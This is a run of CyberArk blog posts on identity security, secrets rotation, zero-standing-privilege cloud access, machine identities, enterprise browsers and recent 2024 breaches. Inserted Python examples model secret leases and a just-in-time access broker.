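Running the script reports `carol` as orphaned and `svc-backup` as unowned, flags `bob`’s unused `admin:prod-db` entitlement, and returns a step-up decision rather than an outright allow for that entitlement until MFA has been verified.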

The Benefits of Prioritizing Identity Security

By implementing an identity security framework, you can achieve the following benefits:

  1. Improved security posture. Organizations can reduce the attack surface and the potential for identity compromise by ensuring that only the right people have access to the right resources under the right conditions and use their access privileges appropriately. Organizations can also improve their visibility and control over their data and systems by monitoring and auditing the activities and behaviors of their users, devices and applications – and detecting and responding to any anomalies or incidents.
  2. Improved compliance and governance. Organizations can comply with security and privacy regulations and standards that apply to the industry and region, ensuring that their identities and access privileges are accurate, up to date and compliant with their policies and requirements. Organizations can also demonstrate their accountability and transparency by generating reports and alerts for their internal and external stakeholders and providing evidence and proof of their compliance and security efforts.
  3. Increased productivity and efficiency. Organizations can streamline and automate their identity security processes and workflows, eliminating manual and error-prone tasks such as password resets, access requests and approvals. Organizations can also optimize their resources and costs by reducing the complexity and overhead of managing and maintaining multiple and different identity security solutions.
  4. Improved user experience and satisfaction. You can provide your users and partners with a seamless and secure access experience, allowing them to access the resources they need, when needed, from any device and location. Organizations can also empower their users and partners with self-service capabilities and delegated administration, allowing them to manage their identities and access privileges, and to request and approve access changes.

Identity security is foundational to robust cybersecurity programs and critical for managing related controls and policies. By prioritizing identity security in cybersecurity strategies, organizations can effectively determine and manage who has access to which resources under what conditions and ensure that these access privileges are used appropriately. This approach is critical to establishing a robust and effective cybersecurity framework, considering it relies on identity as a key security enabler.

Claudio Neiva is CyberArk’s Field Technology Director (LATAM), PAM and Identity Security.

Why Your Organization Needs Dynamic Secrets and Rotation https://www.cyberark.com/blog/why-your-organization-needs-dynamic-secrets-and-rotation/ Tue, 05 Mar 2024 15:57:40 +0000 https://www.cyberark.com/?p=187849

In today’s rapidly evolving digital landscape, organizations confront a formidable array of cyber threats, with attacks and data breaches becoming increasingly prevalent. As businesses embrace transformative technologies such as AI, automation, cloud-native architectures, microservices and containerization, the proliferation of machine identities has surged, often surpassing human identities. CyberArk research underscores this exponential growth of machine identities, highlighting the critical need for robust secrets management best practices to safeguard machine identities. However, navigating the landscape of secrets management can be daunting, and missteps in selecting the right approach can leave organizations vulnerable to attacks.

In this blog post, we’ll delve into two fundamental secrets management approaches – dynamic secrets and secrets rotation – providing clarity on their distinct roles and guiding you in selecting the optimal solution for your organization’s unique needs that will help mitigate risk effectively.

Dynamic Secrets: Enhance Security in Agile Environments

Similar to secrets rotation, dynamic secrets play a crucial role in minimizing the attack surface and mitigating the exposure of sensitive information. Operating on the principle of on demand or just-in-time (JIT) credential generation, dynamic secrets are ephemeral and short-lived, with a predetermined time to live (TTL). Once this TTL expires, the credential is rendered invalid, bolstering security in ephemeral cloud-native environments or microservices architectures where service consumers are transient.

However, while dynamic secrets offer significant advantages in dynamic environments, they may not be ideal for auditing account activity over an extended period. This is because the ephemeral nature of dynamic secrets can result in varying user account names, complicating audit trails.

Moreover, one common pitfall organizations encounter is setting a long TTL or perpetually renewing the same dynamic secret. This practice essentially transforms the dynamic secret into a static one, as it isn’t changed frequently enough. Consequently, the risk of a leak or unauthorized access increases substantially. This is a prime example of trying to fit the wrong solution into a use case.

Secrets Rotation: Auditability and Compliance for Persistent Accounts

Rotated secrets, a cornerstone of robust security practices, are subject to regular replacement at scheduled intervals. This proactive approach to secrets management isn’t just a best practice; it’s often a regulatory requirement enforced by stringent standards such as PCI DSS, which mandates rotation cycles of up to 90 days.

A key difference between rotated and dynamic secrets is that only the secret information is changed during the rotation process, while the account name or identifier remains consistent. This characteristic makes rotated secrets particularly well-suited for long-standing access or accounts expected to persist beyond the lifespan of individual secrets.

While the principles of rotation are simple, the successful implementation of secrets rotation demands a sophisticated solution that can automate and orchestrate the process with precision and reliability. By using automation and advanced rotation capabilities, organizations can uphold security standards, mitigate risks and safeguard their sensitive information effectively.

Building a Flexible and Comprehensive Secrets Management Strategy

Both dynamic secrets and secrets rotation serve distinct purposes within a comprehensive secrets management strategy, and each has unique benefits for specific use cases and environments.

Here’s how organizations should employ each approach:

  • Dynamic Secrets should be used in ephemeral environments where temporary access is needed and the time to live is less than when a secret should be rotated. For example, less than 90 days if you follow the PCI DSS standard.
  • Secrets Rotation is ideal for auditing and tracking access for persistent accounts or when the account needs to live longer than the amount of time when a secret needs to be changed.
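The two bullets above and the preceding sections describe the behaviour in words; here is an added Python model (written for this page, not CyberArk code or any vendor’s API) of both secret types: a dynamic secret issued under a fresh identifier with a TTL and a renewal guard that refuses to let cumulative renewals push its lifetime past the rotation bound (the “effectively static” pitfall described earlier), and a rotated secret whose identifier stays fixed while its value changes and whose old values are kept for audit. Times are integer seconds, the 90-day bound mirrors the PCI DSS figure cited above, and the issuer, the `dyn-` identifier prefix and the function names are hypothetical.

```python
"""Added example: toy model of dynamic (leased) secrets next to rotated secrets.
Not CyberArk code. Times are integer seconds; issuance and naming are hypothetical."""
import secrets
from dataclasses import dataclass, field

# Rotation bound the post cites (PCI DSS: rotate within 90 days), expressed in seconds.
MAX_SECRET_AGE = 90 * 24 * 3600


@dataclass
class DynamicSecret:
    identifier: str          # freshly generated per lease, so it differs on every issuance
    value: str
    issued_at: int
    expires_at: int
    renewals: int = 0


@dataclass
class RotatedSecret:
    identifier: str          # fixed account name; only `value` changes on rotation
    value: str
    rotated_at: int
    history: list = field(default_factory=list)   # (old_value, valid_from, valid_to) for audit


def issue_dynamic(now, ttl):
    """Create a short-lived credential under a fresh identifier (hypothetical issuer)."""
    if ttl <= 0 or ttl > MAX_SECRET_AGE:
        raise ValueError("TTL must be positive and no longer than the rotation bound")
    return DynamicSecret("dyn-" + secrets.token_hex(4), secrets.token_urlsafe(24), now, now + ttl)


def can_renew(secret, now, ttl):
    """Renewal is allowed only while the lease is live and only if the cumulative lifetime
    since first issuance stays within MAX_SECRET_AGE. Refusing the second case is what
    stops a 'dynamic' secret from quietly becoming a static one."""
    if now >= secret.expires_at:
        return False, "lease already expired; issue a new secret"
    if now + ttl - secret.issued_at > MAX_SECRET_AGE:
        return False, "cumulative lifetime would exceed the rotation bound"
    return True, "ok"


def renew_dynamic(secret, now, ttl):
    """Extend the lease in place, or raise with the reason the policy refused."""
    ok, reason = can_renew(secret, now, ttl)
    if not ok:
        raise ValueError(reason)
    secret.expires_at = now + ttl
    secret.renewals += 1
    return secret


def is_valid(secret, now):
    """A dynamic secret is usable strictly before its expiry."""
    return now < secret.expires_at


def rotate(secret, now):
    """Replace the value, keep the identifier, and record the old value's validity window."""
    secret.history.append((secret.value, secret.rotated_at, now))
    secret.value = secrets.token_urlsafe(24)
    secret.rotated_at = now
    return secret


def rotation_overdue(secret, now):
    """True when the current value has outlived the rotation bound."""
    return now - secret.rotated_at > MAX_SECRET_AGE


if __name__ == "__main__":
    lease = issue_dynamic(now=0, ttl=3600)
    print(lease.identifier, is_valid(lease, 3599), is_valid(lease, 3600))
    print(can_renew(lease, 1800, MAX_SECRET_AGE))       # refused: lease would become static
    db = rotate(RotatedSecret("svc-db", "initial-value", 0), now=86400)
    print(db.identifier, db.history)                     # identifier unchanged, old value logged
```

The point of `can_renew` is the second check: a long TTL is already rejected at issuance, but a short TTL renewed indefinitely is the subtler failure, so the guard measures lifetime from the first issuance rather than from the latest renewal. For the rotated secret, `rotation_overdue` is the check a scheduler would run to enforce the interval, and `history` is what gives an auditor a consistent account name across value changes.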

Organizations can effectively address a broader range of security requirements and operational challenges by incorporating both dynamic secrets and secret rotation into their secrets management practices. Dynamic secrets cater to the dynamic nature of modern IT environments, while secrets rotation strengthens long-term security and compliance adherence. Together, they form a robust and comprehensive approach to safeguarding sensitive information and mitigating security risks effectively. Benefits include:

  • Improved operational efficiency. Allows you to automate the creation, distribution and revocation of secrets while reducing the manual effort and human error involved in secrets management.
  • Enhanced auditability and visibility. Enables you to track and monitor the usage and lifecycle of secrets and identify abnormal or malicious behavior.
  • Increased scalability and flexibility. Equips you to support different types of secrets and environments, so your organization can adapt to changing business and security needs.

Maximizing Security with Dynamic Secrets and Rotation

Dynamic secrets and secrets rotation are essential components of a comprehensive secrets management strategy. By understanding their distinct roles and applying them appropriately, organizations can enhance their security posture, mitigate risks and effectively secure their sensitive information against the ever-changing threat landscape.

A SaaS-based secrets management solution empowers organizations with the flexibility required to establish a comprehensive secrets management strategy.

To learn more, check out this on-demand webinar, where we explore the principles of identity security and discuss the use cases behind dynamic secrets and rotation.

John Walsh is a senior product marketing manager at CyberArk.

How Time, Entitlements and Approvals (TEA) Can Secure the Keys to Your Cloud https://www.cyberark.com/blog/how-time-entitlements-and-approvals-tea-can-secure-the-keys-to-your-cloud/ Thu, 29 Feb 2024 23:03:39 +0000 https://www.cyberark.com/?p=187824

A popular topic of conversation in my day-to-day work is how to secure privileged access to cloud management consoles and workloads. And that’s no surprise, considering more and more applications and workloads are migrating to the cloud.

Up until recently, the answer has typically been clear when it comes to identity security and privileged access management (PAM). It’s simple: first, you manage credentials by securing them in a vault. The next step is to rotate them. I’ll even give you extra points if you implement session management for recording and isolation between the end user machines and target systems.

This advice has been the same for quite a while now, and for good reason. It works. But new best practices – like zero standing privileges (ZSP) – are emerging to secure federated privileged access in the cloud.

[Author’s note: In this blog, I will focus solely on access to cloud management consoles.]

A Cloud Access Revolution

Things become a bit more complicated when we start talking about PAM for cloud consoles such as AWS, Azure or GCP. But why would a strategy that’s worked for years suddenly not be as straightforward for the cloud?

One primary reason is that cloud service provider (CSP) consoles behave much like SaaS applications. A key benefit is that they are easily accessible from anywhere via a web browser with internet connectivity.

This accessibility is something that CSP console end users – notably, developers and cloud engineers – love and have come to expect. At the same time, this benefit clashes with the user experience (UX) that PAM best practices have previously constrained them to.

Let’s dive into an example of this challenge…

Imagine an application running in AWS, Azure or GCP that’s not functioning as expected. Our DevOps engineer, Chuck, needs to gain access to the CSP console or command line interface (CLI) to diagnose and fix the issue. Chuck must first access the PAM solution that securely manages the CSP credentials, following the previously mentioned best practices. Once he obtains access to that solution, he must connect to the cloud console via session management.

There’s a bit of irony in this user experience – the CSP console is supposed to be a SaaS application available anywhere from a web browser.

From Chuck’s point of view, restrictions are preventing him from working natively on his system with his own credentials. Not to mention, things become even more difficult if he wants to use the CSP CLI like many developers. If you’re still with me, let’s acknowledge that this scenario doesn’t exactly spotlight smooth accessibility.

Suppose we flip the script and look at this from the security perspective. In that case, a certain number of standing credentials with privileged entitlements must be available at any given time for end users (and potentially attackers) to utilize. Not a great scenario either.

The Time, Entitlements and Approvals (TEA) Concept Enters the Picture

So, how do we design a better experience for our developers and cloud engineers while keeping security foundational? Combining the concept of time, entitlements and approvals (TEA) is an approach we can use to our advantage. With TEA, we no longer need to manage standing credentials for “what if” scenarios and force developers and cloud engineers to use them.

Figure: how time, entitlements and approvals (TEA) tighten control over cloud access.

From the example above, let’s see how TEA can provide a better experience for our DevOps engineer, Chuck. When Chuck needs to gain access to the CSP console to diagnose and fix the app issue, he no longer needs to go to another solution to utilize standing credentials through a proxy. Instead, he can log in to the CSP console or CLI natively with his own federated identity.

In addition to this improved user experience, Chuck’s federated identity has ZSP to the CSP console. This setup means that no entitlements are available by default, providing an essential layer of security. Only after the necessary approvals are met (automatic, contextual, manual) will privileged access be granted. This access is only approved for the window of time required and with specific entitlements (aka the principle of least privilege (PoLP)). An audit will also readily pinpoint the work Chuck performed during this period because he logged in with his federated identity. Once the approved session expires, those entitlements are automatically revoked, taking Chuck back to ZSP and securing our environment.
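To make Chuck’s TEA flow concrete, here is an added Python sketch of a zero-standing-privileges broker (example code written for this page, not CyberArk’s product or any CSP API): a federated identity holds no entitlements by default, a request is approved either automatically (for a constructed low-risk set) or by a named approver who is not the requester, each grant carries a bounded time window and an explicit entitlement list, every decision is appended to an audit log under the federated identity, and once the window passes the effective entitlements fall back to the empty set. The approval rule, the entitlement names, the four-hour window limit and the audit record format are assumptions.

```python
"""Added example: toy zero-standing-privileges (ZSP) broker modelling time, entitlements
and approvals (TEA). Not CyberArk code; policy, names and log format are hypothetical."""
from dataclasses import dataclass
from typing import Optional

MAX_WINDOW = 4 * 3600                                   # assumption: longest elevation allowed, seconds
AUTO_APPROVE = {"cloudwatch:read", "ec2:describe"}      # constructed low-risk set that policy auto-approves


@dataclass(frozen=True)
class Grant:
    identity: str            # federated identity, e.g. a constructed "chuck@example.com"
    entitlements: frozenset  # explicit entitlement list (least privilege), never "admin"
    starts_at: int
    ends_at: int             # after this instant the grant contributes nothing
    approved_by: str


class ZspBroker:
    def __init__(self):
        self.grants = []     # every grant ever issued, kept for audit
        self.audit = []      # (time, identity, outcome, detail)

    def request(self, identity, entitlements, duration, now, approver: Optional[str] = None):
        """Return a Grant, or None when denied or waiting on manual approval.
        Nothing is ever granted without passing through here (zero standing privileges)."""
        ents = frozenset(entitlements)
        if duration <= 0 or duration > MAX_WINDOW:
            self.audit.append((now, identity, "denied", "window out of bounds"))
            return None
        if ents <= AUTO_APPROVE:
            approved_by = "policy:auto"                  # automatic approval path
        elif approver and approver != identity:
            approved_by = "manual:" + approver           # manual path; self-approval is refused
        else:
            self.audit.append((now, identity, "pending", "manual approval required"))
            return None
        grant = Grant(identity, ents, now, now + duration, approved_by)
        self.grants.append(grant)
        self.audit.append((now, identity, "granted", sorted(ents)))
        return grant

    def effective_entitlements(self, identity, now):
        """Union of entitlements from grants active at `now`; the default is the empty set,
        so expiry revokes access without any explicit clean-up step."""
        active = set()
        for g in self.grants:
            if g.identity == identity and g.starts_at <= now < g.ends_at:
                active |= g.entitlements
        return active

    def authorize(self, identity, entitlement, now):
        """Per-action check the console or CLI would perform, logged under the federated identity."""
        allowed = entitlement in self.effective_entitlements(identity, now)
        self.audit.append((now, identity, "allow" if allowed else "deny", entitlement))
        return allowed


if __name__ == "__main__":
    broker = ZspBroker()
    chuck = "chuck@example.com"                          # constructed federated identity
    print(broker.effective_entitlements(chuck, 0))       # set(): ZSP by default
    broker.request(chuck, {"ec2:describe"}, 3600, now=100)
    print(broker.authorize(chuck, "ec2:describe", 200))  # True inside the window
    print(broker.authorize(chuck, "ec2:describe", 3700)) # False once it has lapsed
    for record in broker.audit:
        print(record)
```

Two details carry the security weight: the approval branch refuses a request that names the requester as its own approver, and expiry is enforced by the time comparison in `effective_entitlements` rather than by a revocation job that might fail to run, which is what “automatically revoked” has to mean in practice.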

Reimagining PAM and Its TEA UX Makeover

PAM has been an essential pillar of cybersecurity for years and will continue to be even as more development moves to the cloud. However, this doesn’t mean PAM shouldn’t adapt. Concepts such as ZSP, just-in-time (JIT) and dynamic access are paving the way for the evolution of PAM.

It’s (TEA) time to give developers and cloud engineers their desired user experience – one that capitalizes on the benefits that SaaS and CSP consoles provide while still enforcing the necessary level of security. And it all comes down to the right combination of time, entitlements and approvals.

Let the evolution of PAM continue.

Mike Bykat is a global solution strategy architect for Cloud Security at CyberArk.

Why Machine Identities Are Essential Strands in Your Zero Trust Strategy https://www.cyberark.com/blog/why-machine-identities-are-essential-strands-in-your-zero-trust-strategy/ Tue, 27 Feb 2024 16:07:20 +0000 https://www.cyberark.com/?p=187783

Just like a snagged strand can ruin your garment, overlooking the security of machine identities can tear the very fabric of Zero Trust that protects your organization from bad actors. As a quick refresher, Zero Trust operates on the principle that no entity inside or outside the network perimeter is trusted by default. As we usher in an era where the traditional network perimeter has dissolved due to cloud services, remote work and mobile access, the necessity for Zero Trust becomes even more pronounced.

However, a critical component of this framework that security teams too often overlook is the management of machine identities. While security teams don’t always apply Zero Trust principles to machine identities, for attackers, unprotected machine identities are another entry point to your organization’s sensitive data. And the problem is getting bigger.

Machine Identities Now Outnumber Human Identities by a Factor of 45 to One

A machine identity is a unique identifier distinguishing software code, applications, virtual machines or even physical IoT devices from others on a network. It’s used to authenticate and authorize the machine to access resources and services. Machine identities use secrets, API keys, Cloud Access Keys, digital certificates and other credentials to enable machines to communicate securely with other systems.

As organizations digitally transform, the number of machines – applications, containers, automation scripts, virtual machines, Lambda and other computing functions – grows exponentially. Machine identities now outweigh human identities by a factor of 45:1. Therefore, we can assume they also have greater access to sensitive data than human identities. Without the right policies and automation, machine identities and secrets become a vastly expanding attack surface for cyber adversaries.

Digital Transformation: Fueling the Proliferation of Machine Identities and Secrets

Most organizations today enable their missions with software as a service (SaaS) applications – storing data in one or more clouds and even developing software applications to serve their customers. The CyberArk 2023 Identity Security Threat Landscape report finds that organizations expect an increase of 68% in the number of SaaS applications deployed in their environment. Additionally, another CyberArk report indicates that 80% of organizations will use three or more cloud service providers (CSPs). This digital transformation spurs the proliferation of machines in our networks and the corresponding growth in the number of secrets needed to access IT and other resources securely. And the rapid growth has outpaced our ability to manually track the number, purpose and location of machines and secrets. That’s why it’s unsurprising that 65% of organizations either took steps to protect machine identities last year or plan to do so in the next 12 months.

The dynamic nature of hybrid and multi-cloud environments and DevOps practices requires automated secrets rotation and issuance, renewal and revocation of machine identities. Manual processes are prone to errors and cannot keep pace with the speed at which modern IT environments change. To protect your organization’s digital assets holistically, it’s imperative that you implement a robust Zero Trust strategy that includes a plan for securing and managing machine identities and their secrets.

Why Machine Identity Management is a Zero Trust Strategy Essential

As your organization builds its Zero Trust roadmap, ensure machine identities and secrets management are specifically called out in your identity governance policy and procedures. Machine identities and secrets management are essential components of a Zero Trust security strategy because they provide a means of authentication and secure communication between machines on a network. By including machine identities and secrets management in your Zero Trust strategy, organizations can ensure that only trusted machines can communicate on the network and that unauthorized access attempts are detected and prevented.

Machine identity management policies should be established to govern machine identity generation, renewal and revocation. Regular audits and monitoring should also be conducted to identify abnormal or unauthorized activity.

It’s crucial to aim for at least four goals as you build out your machine identity practices:

  1. Greater visibility. Currently, 62% of security teams operate with limited visibility across their environment, making the task of securing human and especially machine identities cumbersome and inefficient. A comprehensive secrets management and machine identity management policy can give organizations greater visibility into their network, allowing them to closely monitor and track managed and unmanaged secrets and machine activity. By enhancing visibility, you can ensure the provisioning of certificates across all areas of IT infrastructure, including hybrid and multi-cloud environments.
  2. Improved security. Centralized management of secrets and machine identities is a key element of a comprehensive Zero Trust strategy. Functions like centralized rotation of secrets help eliminate the problem of hard-coded secrets and enable organizations to audit which applications and machines are using each secret.
  3. Lower risk digital transformation enablement. The dynamism of hybrid and multi-cloud environments and DevOps practices demands agile central management for secrets and machine identities. Integrating identity security automatically in CI/CD pipelines, for instance, ensures that identity integrity is baked into your development processes and not just an afterthought.
  4. Improved operations efficiency. Automation tools improve efficiency. Additionally, native integrations with DevOps tools and the cloud provider’s built-in (native) services increase developers’ adoption of secure coding practices, ultimately increasing overall productivity and accelerating the deployment of new services.

Ultimately, incorporating machine identities and secrets management into a Zero Trust strategy can help your organization establish a more robust and secure network architecture and reduce costs associated with traditional security approaches while reducing the time to deploy new services. A comprehensive machine identity management policy can help organizations secure their networks and protect against cyber threats. By proactively managing machine identities and secrets, organizations can ensure that only trusted machines can communicate on the network and that any unauthorized access attempts are quickly detected and prevented.

As organizations continue to adopt Zero Trust, they must pay attention to the pivotal role that machine identities play in digital environments. And that’s why the overall security strategy must account for them. Investing in tools and processes to manage these identities effectively will pay dividends by reducing risk and ultimately fortifying the organization’s security posture in the face of an ever-changing threat landscape.

Machine Identities and Secrets: Organizational Binding Strands

My call to action for any organization is straightforward: Embed the management of machine identities and secrets into your Zero Trust strategy. Rigorously verify identities, systematically manage machine identities and secrets – and use threat analytics to understand when and where they’re being abused. Remember, in the fabric of cyber defense, a layered defense is critical and letting even one thread unravel can lead to a garment’s undoing. That’s why machine identities and secrets are not just threads; they are vital strands that hold together the security tapestry of our digital enterprises.

James Imanian is the senior director of the U.S. Federal Technology Office at CyberArk.

Enterprise Browser: The Gateway to Securing All Identities
https://www.cyberark.com/blog/enterprise-browser-the-gateway-to-securing-all-identities/
Wed, 21 Feb 2024 14:37:16 +0000

With new identities, environments and attack methods dominating today’s threat landscape, cybersecurity leaders are hyper-focused on securing identities to safeguard enterprises. However, a glaring, high-touch security gap exists that threat actors actively exploit to steal confidential data. And unsuspecting as it seems, that gap lies in the most used enterprise application of all time – the web browser.

In today’s cloud-first world, browsers are the gateway to a company’s most critical assets and house sensitive information, such as user credentials and cookie data, making them prime targets for attackers. Yet, in a decidedly ironic reality, browser security rarely ranks on the priority list of security teams, making enterprises susceptible to attacks.

This seemingly nonsensical practice – or lack of practice – is primarily because organizations continue to use consumer-focused browsers for enterprise needs. Built for convenience over protection, these browsers enable access without securing it and lack the control and visibility security teams need to mitigate potential security incidents. This exposes organizations to various browser-based vulnerabilities – pre- and post-authentication, such as cookie hijacking, malware attacks on unmanaged endpoints and unauthorized user access leading to data exfiltration.

In an increasingly complex IT world, browsers that are disconnected from a broad end-to-end identity security infrastructure pose a massive threat to enterprises. For instance, workforce identities and their actions within browser environments often remain hidden from security teams, creating a gaping Achilles’ heel that enables attackers to steal confidential data without detection.

As such, security leaders need a solution that integrates a foundational identity security strategy into the browser environment and layers with existing infrastructure to balance enterprise security and workforce productivity effectively.

Securing Enterprise Web Browsing with an Identity-centric Approach

As organizations migrate to the cloud and the workforce grows, web browsers have become an intrinsic part of enterprise operations. From employees to third-party vendors – everyone uses a browser to access the confidential corporate resources required to do their jobs.

But with access comes risk, and mitigating it requires deep end user visibility and security controls that traditional browsers aren’t designed to provide. Adding to the risk, employees often use the same work browser to access their personal data in cloud consoles. This creates more opportunities for breaches, insider exfiltration and malware attacks.

Even for organizations with an identity and access management (IAM) strategy and dedicated privileged access management (PAM) solutions in place, browser-based vulnerabilities can easily expose them to potential threats and breaches.

The following are some common browser capabilities that, in an enterprise environment, can pose serious security threats:

  • Allowing users to install unverified extensions that can secretly upload data to attacker-controlled servers.
  • Providing enterprise workers with built-in tools to circumvent preventative controls put in place by the organization.
  • Enabling users to store passwords for all their applications – work-related and personal – in built-in password managers that are prone to breaches.

Attackers can harness the same basic functionalities designed for a convenient user browsing experience to carry out nefarious activities unless they are adequately protected. A prime example is cookie hijacking, where attackers steal, forge, alter or manipulate cookies from users’ web sessions to gain unauthorized access to sensitive resources. It’s a relatively simple post-authentication attack vector in which, in three steps, a threat actor:

  1. Acts as an imposter to hijack the cookies after a session has been authenticated.
  2. Replays the cookie in the session to bypass multi-factor authentication (MFA).
  3. Hijacks ongoing sessions to steal data, move laterally and escalate privileges to disrupt operations.

The bottom line is that enterprises need a comprehensive identity security strategy based on intelligent privilege controls that goes beyond endpoints into browsers to secure every workforce identity with access to the heart of your enterprise.

So, what does it take for browsers to integrate with your larger security infrastructure?

The simple answer would be extending the identity-based approach used for everything else into browsers. This would give IT teams the vantage point to ensure all workforce identities – employees, vendors and remote workers – adhere to risk-tolerant practices, guided by the principles of least privilege (PoLP) and just-in-time (JIT) access.

Navigating Today’s Threat Landscape with an Identity-focused Enterprise Browser

The actual value of an enterprise browser can be realized when combined with existing security infrastructure. For instance, enterprise browsers can prevent cookie hijacking by storing cookies on secure servers. This enables organizations to keep sensitive data beyond the reach of attackers so user web sessions, data and accounts remain protected.

Enterprise browsers should also come with built-in controls that can extend access to privileged targets using native integration to enable security teams to monitor end user activities within high-risk browser sessions, enforce policy-based browsing and prevent misuse of confidential corporate data.

By working together with other defense-in-depth solutions such as MFA, single sign-on (SSO) and session monitoring, enterprise browsers can:

  • Secure identities, endpoints, passwords and credentials from pre- and post-authentication attacks.
  • Enable users to access their resources and applications securely.
  • Unify identity security controls while ensuring privacy for every identity on every endpoint.

Breaking Browser Silos to Balance Security and Productivity

While traditional browsers are largely siloed and not built to tackle the challenges posed by today’s identity-focused threat landscape, enterprise browsers alone can disrupt user experiences, given their restrictive controls.

For optimal web security and a seamless workforce experience, the enterprise browser and your current security solutions must work together to pave the way for an identity-based security posture that can prevent modern attacks.

Learn about CyberArk Secure Browser.

Sobhan Pramanik is a senior copywriter at CyberArk.

CIO POV: 3 Considerations as the 2024 Cyber Roller Coaster Gathers Speed
https://www.cyberark.com/blog/cio-pov-3-considerations-as-the-2024-cyber-roller-coaster-gathers-speed/
Thu, 15 Feb 2024 14:44:46 +0000

If the first month-plus of 2024 is any indication, this year is likely to be anything but ordinary in the cybersecurity realm. In January alone, a triad of events unfolded, each more riveting than the last, setting the stage for a year that promises to be as unpredictable as it is exciting.

The following recent events have me reflecting on processes and controls that can help you better protect your organization’s most sensitive assets:

1. Nation-State Threat Actors Target High-Tech Companies

APT29, the threat group behind the 2021 SolarWinds attack and linked to the Russian Foreign Intelligence Service (SVR), resurfaced in January when two tech giants – Microsoft and HPE – reported that the group had infiltrated their systems and accessed, monitored and exfiltrated data from various employee accounts, including those of executives.

Prior to these high-profile attacks, APT29, also known as Cozy Bear, is believed to have been responsible for the 2015-16 breach of unclassified networks at institutions such as the White House, the U.S. Department of State and the Democratic National Committee (DNC). Reports indicate that the same group has also operated successfully in Germany, South Korea and Ukraine.

A few days ago, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued multiple Common Vulnerabilities and Exposures (CVE) advisories identifying vulnerabilities in products or services from a reputed cybersecurity vendor used by many government agencies. CISA has warned that bad actors from China, part of the Volt Typhoon group, are exploiting these vulnerabilities, and has highlighted the potential risk to nation-states.

It’s certain now that the espionage and reconnaissance activities of nation-state threat actors are not limited to hacking critical infrastructure owned and operated by national government agencies. Instead, the increasing reliance of government agencies on an ever-growing technology ecosystem makes any supplier a potential victim. And the next victim could be you.

2. Unmitigated CVE 10 Invites Exploitation Attempts

On Jan. 16, 2024, Atlassian published an advisory on a critical vulnerability in out-of-date versions of Confluence Data Center and Server. If successfully exploited, this vulnerability allows unauthenticated remote attackers to achieve remote code execution (RCE) on an affected instance. Days after the advisory was published with a CVSS score of 10, the Shadowserver Foundation observed nearly 40,000 exploitation attempts against this CVE. I assume these exploitation attempts were observed on instances that did not heed the warning to patch.

CVEs with a CVSS score of 10 indicate critical severity and require an immediate AppSec remediation plan. Security breaches often stem from known vulnerabilities left unmitigated, which underscores the importance of a mature change management process. The inability to patch or upgrade software immediately despite an advisory often reflects complex or ill-defined change management processes. Additionally, interdependencies can slow patching or upgrading because of the potential downstream impact on other processes.

3. Ransomware Continues to be Evergreen

The CyberArk 2023 Identity Security Threat Landscape Report finds that 89% of 2,300 global respondents have faced at least one ransomware attack. Ransomware is a big, if not the biggest, cybersecurity problem in the connected digital world and the first month of 2024 was no different. Tigo, a large telecommunications company in Paraguay; Kenya Airways, one of the largest airlines in Africa; AerCap, the largest aviation leasing company based out of Ireland; and Swedish government agencies are just a few examples of enterprises or government bodies that have suffered a ransomware attack in January 2024.

With the advent and adoption of GenAI, I expect ransomware attacks to increase substantially and potentially impact organizations of all sizes – even yours.

Buckle Up This Year – We’re Likely In For a Ride

Brace yourself for what I expect to be a roller coaster ride in 2024 for several reasons. This year, over 49% of the world’s population is expected to participate in national elections in over 64 countries. As a result of this, in addition to the regular threat landscape, we’ll see nation-state actors increasingly targeting rival government agencies, tech providers supporting the critical infrastructure and netizens to maximize their bounty – whether it be influence, espionage or purely monetary gains. In the wake of these impending attacks, I recommend that you bolster your organization’s defenses by considering the following:

Encrypt your email. Email accounts are often the lowest-hanging fruit that bad actors target regularly and incessantly. In today’s world, compromised emails are a gateway not just to financial bounty but to espionage for nation-state actors. In a world of cybersecurity and cyberwarfare, you must implement end-to-end email encryption (including attachments) to protect your organization’s data and, in turn, your customers.

Bring Your Own Key (BYOK). Your encrypted data is secure only as long as the encryption keys are secured. BYOK lets you fully control the encryption key used to encrypt your data. Since you are fully responsible for hosting, managing access to, rotating and revoking the encryption key, you maintain control over your data, particularly in complex multi-cloud environments.

Review and iterate change and risk management processes. Change management based on risk assessment offers a systematic method for modifying security procedures, technologies and operations that ensures every change is assessed, planned, communicated and monitored and, most importantly, reduces the risk of disruption and vulnerabilities. Ensure emergency cyber response (ECR) processes are in place to execute robust patch management cycles within 24 hours of a critical-severity CVE advisory. This will help you contain the vulnerability swiftly and keep the genie in the bottle.

In this changing technological landscape, I recommend assessing the residual impact of change management to protect your organization’s sensitive assets. Sometimes, during the risk assessment process, you may discover that upgrading or patching might offer less than a 50% chance of improved protection, in which case you may choose to accept the risk and stay with the existing software version. In this case, robust compensating controls are your best savior.

Ensure compensating controls. These address weaknesses in existing controls or compensate for the inability to meet specific security requirements due to various constraints. Virtual private networks (VPNs) and phishing-resistant multi-factor authentication (MFA) are examples of controls implemented to bolster your defense-in-depth capabilities.

Consider the value of SaaS. Your AppSec teams might benefit from leveraging SaaS offerings, considering that patching and preventing vulnerabilities are daily tasks that consume a considerable amount of time. Be sure to evaluate not just your SaaS vendor’s processes to secure its environment but the focus and rigor it applies to the best practices on patching cadence based on a vulnerability’s severity. SaaS offerings provide proactive application and infrastructure support, including weekly or monthly patch management. They can effectively and efficiently implement patches or upgrade software in case of CVEs with scores of nine or 10 that require immediate attention. You’ll also potentially improve the availability of services by leveraging SaaS.

Bad Planning is Worse for Security Than Complexity

The first month of this year reminded us of the challenges we face in the digital age and of our capacity to rise to them. I encourage you to review your change management process and risk assessment cadence. Ensure you have the right compensating controls and consider if it’s time to adopt SaaS. Also, as you consider implementing these recommendations, the complexity of your environment or processes may seem like a roadblock to improved security. In my experience, it’s more often an ill-defined plan that is the roadblock to security than the complexity itself. So, I’d suggest starting with your risk assessment plans, making them robust and agile enough to address your business goals, and working backward to implement the above suggestions.

See you next month.

Omer Grossman is the global chief information officer at CyberArk. You can check out more content from Omer on CyberArk’s Security Matters | CIO Connections page.

APT29’s Attack on Microsoft: Tracking Cozy Bear’s Footprints
https://www.cyberark.com/blog/apt29s-attack-on-microsoft-tracking-cozy-bears-footprints/
Thu, 08 Feb 2024 14:51:00 +0000

